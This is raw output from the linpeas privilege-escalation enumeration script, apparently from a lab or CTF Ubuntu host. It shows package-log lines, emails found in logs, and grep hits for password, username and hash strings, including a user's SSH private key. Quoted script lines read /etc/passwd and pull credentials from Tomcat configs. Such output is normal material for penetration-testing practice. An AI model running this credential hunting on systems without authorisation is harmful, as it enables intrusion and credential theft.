/var/log/dpkg.log:2017-08-01 11:16:31 status half-configured base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:31 status installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:31 status unpacked base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:37 configure passwd:amd64 1:4.2-3.1ubuntu5 <none>
/var/log/dpkg.log:2017-08-01 11:16:37 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:37 status installed passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:37 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:35 upgrade passwd:amd64 1:4.2-3.1ubuntu5 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:36 configure passwd:amd64 1:4.2-3.1ubuntu5.3 <none>
/var/log/dpkg.log:2017-08-01 11:17:36 status half-configured passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:36 status installed passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:36 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/installer/status:Description: Set up users and passwords

[+] Finding emails inside logs (limit 70)
     58 /var/log/installer/status:[email protected]
     28 /var/log/installer/status:[email protected]
     17 /var/log/installer/status:[email protected]
      4 /var/log/bootstrap.log:[email protected]

[+] Finding *password* or *credential* files in home (limit 70)

[+] Finding 'pwd' or 'passw' variables inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
/etc/acpi/powerbtn.sh:                userhome=`getent passwd $user | cut -d: -f6`
/etc/bash_completion.d/grub:__grub_mkpasswd_pbkdf2_program="grub-mkpasswd-pbkdf2"
/etc/nsswitch.conf:passwd:         compat
/etc/samba/smb.conf.bak:   passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
/etc/samba/smb.conf.bak:   passwd program = /usr/bin/passwd %u
/etc/security/namespace.init:                gid=$(echo "$passwd" | cut -f4 -d":")
/etc/security/namespace.init:        homedir=$(echo "$passwd" | cut -f6 -d":")
/etc/security/namespace.init:        passwd=$(getent passwd "$user")
/tmp/linpeas.sh:      SHELLUSERS=`cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1`

[+] Finding possible password variables inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)

[+] Finding 'username' string inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
/tmp/linpeas.sh:    for f in $tomcat; do grep "username=" $f 2>/dev/null | grep "password=" | sed "s,.*,${C}[1;31m&${C}[0m,"; done

[+] Looking for specific hashes inside files - less false positives (limit 70)

[+] Looking for md5/sha1/sha256/sha512 hashes inside files (limit 50)
/etc/java-8-openjdk/security/blacklisted.certs:14E6D2764A4B06701C6CBC376A253775F79C782FBCB6C0EE6F99DE4BA1024ADD
/etc/grub.d/05_debian_theme:648ee65dd0c157a69b019a5372cbcfea4fc754a5 
/etc/machine-id:a59c744e2166cb4a90376b2f5ad6279f
/etc/popularity-contest.conf:"381d9c0601344d33897a7a5a7f8815c0"
/home/kay/.ssh/id_rsa:,6ABA7DE35CDB65070B92C1F760E2FE75